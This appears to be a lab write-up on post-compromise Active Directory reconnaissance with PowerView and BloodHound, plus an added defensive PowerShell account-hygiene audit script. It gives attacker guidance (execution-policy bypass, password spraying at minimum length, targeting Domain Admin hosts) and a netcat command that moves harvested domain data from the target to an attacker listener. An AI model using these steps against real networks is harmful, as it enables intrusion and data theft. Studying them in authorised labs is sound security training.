Post-compromise enumeration of the lab with the captured credentials/hashes. Overview of PowerView and Bloodhound setup and usage.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use the information at your own risk. By continuing to read, you acknowledge the aforementioned user risks/responsibilities.
Based on TheCyberMentor's excellent Udemy course, available at https://www.udemy.com/course/practical-ethical-hacking/
Requirements: with the credentials recovered from the MITM attack we can use the following tools:
- PowerView — Link: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
Transfer PowerView.ps1 to the target.
Execution policy bypass (the execution policy only controls whether scripts run; it is not a security boundary):
PowerView is a very powerful tool; more information is available via the cheat sheet:
Get Domain Policy:
Find the minimum password length, then just start attacking with 7-character passwords.
Long, semi-unreadable list.
List the properties we can search on by piping the output:
Find when passwords were last set:
This shows whether there are stale passwords on the network.
Check Logon Count (used to identify honeypot accounts):
Check bad password counts (you can see if an account is under attack):
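The three attributes above (pwdlastset, logoncount, badpwdcount) are exactly what a defender audits on their own domain. The following PowerShell is an added example, not code from the original post or from PowerView: it flags stale passwords, accounts with high bad-password counts, and enabled accounts that have never logged on. The attribute names mirror AD, the records are constructed here so it runs offline, and the 90-day and 5-attempt thresholds are assumptions to be replaced with your own domain policy values.

```powershell
# Added example (not from the original post or PowerView): audit user records for the
# same signals PowerView enumerates, from the defender's side. In a live domain, replace
# the constructed $sample with:
#   Get-ADUser -Filter * -Properties pwdLastSet,badPwdCount,logonCount,Enabled
function Get-AccountHygieneFindings {
    param(
        [Parameter(Mandatory)] [object[]] $Users,
        [int] $MaxPasswordAgeDays = 90,     # assumption; take the real value from Get-DomainPolicy
        [int] $BadPasswordThreshold = 5,    # assumption; many accounts over this suggests spraying
        [datetime] $Now = (Get-Date).ToUniversalTime()
    )
    foreach ($u in $Users) {
        $findings = New-Object System.Collections.Generic.List[string]
        # pwdLastSet is a Windows FILETIME; 0 means "must change password at next logon"
        if ([int64]$u.pwdLastSet -eq 0) {
            $findings.Add('password never set / must change at next logon')
        } else {
            $ageDays = ($Now - [datetime]::FromFileTimeUtc([int64]$u.pwdLastSet)).TotalDays
            if ($ageDays -gt $MaxPasswordAgeDays) {
                $findings.Add(('stale password, last set {0:N0} days ago' -f $ageDays))
            }
        }
        if ($u.badPwdCount -ge $BadPasswordThreshold) {
            $findings.Add("badPwdCount=$($u.badPwdCount): account may be under a guessing attack")
        }
        if ($u.enabled -and $u.logonCount -eq 0) {
            $findings.Add('enabled but never logged on: dormant account or honeypot, review it')
        }
        if ($findings.Count -gt 0) {
            [PSCustomObject]@{ SamAccountName = $u.samAccountName; Findings = ($findings -join '; ') }
        }
    }
}

# Build a FILETIME from a UTC calendar date, for the constructed sample below
function ConvertTo-FileTime([int]$y, [int]$m, [int]$d) {
    [datetime]::new($y, $m, $d, 0, 0, 0, [DateTimeKind]::Utc).ToFileTimeUtc()
}

# Constructed sample records (not real accounts); evaluated as of 2020-06-01 UTC
$asOf = [datetime]::new(2020, 6, 1, 0, 0, 0, [DateTimeKind]::Utc)
$sample = @(
    [PSCustomObject]@{ samAccountName = 'alice';      enabled = $true;  logonCount = 312; badPwdCount = 0;  pwdLastSet = (ConvertTo-FileTime 2020 4 10) }
    [PSCustomObject]@{ samAccountName = 'bob';        enabled = $true;  logonCount = 58;  badPwdCount = 0;  pwdLastSet = (ConvertTo-FileTime 2018 2 1) }
    [PSCustomObject]@{ samAccountName = 'svc_backup'; enabled = $true;  logonCount = 9;   badPwdCount = 0;  pwdLastSet = 0 }
    [PSCustomObject]@{ samAccountName = 'carol';      enabled = $true;  logonCount = 150; badPwdCount = 27; pwdLastSet = (ConvertTo-FileTime 2020 5 20) }
    [PSCustomObject]@{ samAccountName = 'itadmin2';   enabled = $true;  logonCount = 0;   badPwdCount = 0;  pwdLastSet = (ConvertTo-FileTime 2020 1 5) }
)
Get-AccountHygieneFindings -Users $sample -Now $asOf | Format-Table -AutoSize
```

Only alice produces no finding; the other four records each trip one of the checks, which is the same picture an attacker running the PowerView queries above would see.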
List all network domain computers:
Slightly too much information.
Find the operating systems:
Pick apart the network to identify which machines are the servers.
Find Domain Admins:
Get the members of the Domain Admins group:
Find All SMB Shares on the Network:
Find All Group Policies:
Check GPOs for their display names and when they were changed:
Condensed version of a larger output.
Bloodhound downloads the data from Active Directory and puts it into a visual graph.
Set up neo4j: run neo4j console and change the default password.
Open the link shown:
Log in with neo4j:neo4j; you are prompted to change the password.
Opted to use the kali password.
Launch Bloodhound - Linux/Kali
Log in with the neo4j account and the neo4j URL. Bloodhound setup is complete; the next step is to pull data with the ingestor.
Pull data with the ingestor
- Invoke-BloodHound - PowerShell
- Place it onto the Windows 10 machine
Within the command prompt, set up the execution policy bypass.
Move the file to Kali. Used the nc file transfer method; downloaded nc.exe onto the Windows machine via SimpleHTTPServer on Kali.
nc File Transfer Method:
- Kali setup listener: ncat -lvp 80 > file.zip
- Windows 10 machine: nc -nv 192.168.175.129 80 < file.zip -w15
Import file.zip into Bloodhound: upload file.zip via the upload button within Bloodhound:
At this point my Bloodhound crashed when loading file.zip, to which I attempted to reinstall… and failed. Moved to build from source… failed. All mainly due to the fact that I was on the x86 version of Kali. Moved to install Bloodhound on a Windows 10 machine following these directions:
Neo4j BloodHound issues:
IMPORTANT: when you install Java on the machine you will need to edit line 75:
and within the Java folder you need to copy the “client” folder and paste it as “server”:
Launch Bloodhound - Windows
From this point I was able to load file.zip into BloodHound:
Finding Domain Admins via the “Find all Domain Admins” query.
You will want to target boxes where Domain Admins have accounts.
- Locating High Value Targets via the query
Paths to follow are illuminated in red.
Once a network is compromised you can plan your next target with Bloodhound.